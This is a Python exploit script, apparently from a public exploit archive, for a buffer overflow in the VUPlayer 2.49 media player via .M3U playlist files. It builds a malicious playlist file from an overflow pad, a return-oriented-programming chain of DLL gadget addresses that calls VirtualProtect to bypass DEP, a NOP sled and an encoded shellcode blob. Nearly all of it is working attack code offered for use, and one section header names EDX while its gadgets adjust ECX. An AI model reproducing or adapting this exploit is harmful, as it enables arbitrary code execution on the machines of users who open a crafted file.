VUPlayer 2.49 - (.M3U) Universal Buffer Overflow DEP Bypass

1. # VUPlayer 2.49 (.M3U) Exploit(Universal buffer overflow/DEP bypass)
2. # Download: http://vuplayer.com/
3. # Tested on Wind0ws XP SP3 DEP:OptOut
4. # Author: Lu_c_fer ------>>> Lu_c_fer@aol.com , Twitter.com/lu_cif_er (feel free to tell me your ideas!! :))
5.  
6. # All the Gadgets are from APP's DLLs(I could only use the addresses that doesnt start with null)
7.  
8.  
9.  
10. import struct
11.  
12. p = open("Exploit_VirtualProtect.m3u", "w")
13.  
14. crash = "\x41" * 1012
15.  
16. sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
17. "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
18. "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
19. "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
20. "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
21. "\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
22. "\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
23. "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
24. "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
25. "\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
26. "\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
27. "\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
28. "\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
29. "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
30. "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
31. "\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
32. "\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
33. "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
34. "\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
35. "\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
36. "\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
37. "\x51\x42\x4c\x42\x43\x43\x30\x41\x41")
38.  
39. #---------------------------Setting 0x00000201 into EBX----------------------------
40. rop = struct.pack('<L',0x10015f77) # POP EAX # RETN
41. rop += struct.pack('<L',0x5f5f01ff)
42. rop += struct.pack('<L',0x1001e453) # SUB EAX,5F5EFFFE # RETN 0x04
43. rop += struct.pack('<L',0x1003a084)
44. rop += struct.pack('<L',0x42424242)
45. rop += struct.pack('<L',0x1001033f) # INC EAX # RETN
46. rop += struct.pack('<L',0x100110ff) # POP EBX # RETN [BASS.dll]
47. rop += struct.pack('<L',0xffffffff) #
48. rop += struct.pack('<L',0x10015ef2) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
49.  
50. #---------------------------Setting the pinter to the VirtualProtect into ESI----------------------------
51.  
52. rop += struct.pack('<L',0x10015f77) # POP EAX # RETN
53. rop += struct.pack('<L',0x10109270) # ptr to &VirtualProtect() [IAT BASSWMA.dll]
54. rop += struct.pack('<L',0x1001eaf1) # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
55. rop += struct.pack('<L',0x10030950) # XCHG EAX,ESI # RETN [BASS.dll]
56.  
57. #---------------------------Setting 0x00000040 into EDX(*******TRUST ME IT WAS THE ONLY WAY!!! :)******)----------------------------
58. rop += struct.pack('<L',0x1004041c) # POP EDX # RETN [BASS.dll]
59. rop += struct.pack('<L',0xffffffff)
60. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
61. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
62. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
63. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
64. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
65. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
66. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
67. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
68. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
69. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
70. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
71. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
72. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
73. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
74. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
75. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
76. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
77. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
78. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
79. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
80. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
81. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
82. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
83. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
84. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
85. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
86. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
87. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
88. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
89. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
90. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
91. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
92. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
93. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
94. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
95. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
96. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
97. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
98. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
99. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
100. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
101. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
102. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
103. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
104. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
105. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
106. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
107. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
108. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
109. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
110. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
111. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
112. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
113. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
114. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
115. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
116. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
117. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
118. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
119. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
120. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
121. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
122. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
123. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
124. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
125. # ECX is now 0x00000040
126.  
127.  
128. rop += struct.pack('<L',0x10010157) # POP EBP # RETN [BASS.dll]
129. rop += struct.pack('<L',0x1010539f) # & jmp esp [BASSWMA.dll]
130.  
131. rop += struct.pack('<L',0x10601007) # POP ECX # RETN [BASSMIDI.dll]
132. rop += struct.pack('<L',0x101087c3) # &Writable location [BASSWMA.dll]
133.  
134. rop += struct.pack('<L',0x100190b0) # POP EDI # RETN [BASS.dll]
135. rop += struct.pack('<L',0x1003a084) # RETN (ROP NOP) [BASS.dll]
136.  
137. rop += struct.pack('<L',0x10015fe7) # POP EAX # RETN [BASS.dll]
138. rop += struct.pack('<L',0x90909090) # &Writable location
139.  
140. rop += struct.pack('<L',0x1001d7a5) # PUSHAD # RETN [BASS.dll]
141.  
142. nop = "\x90"*40
143.  
144. payload = crash + rop + nop + sc
145.  
146.  
147. p.write(payload)
148. p.close()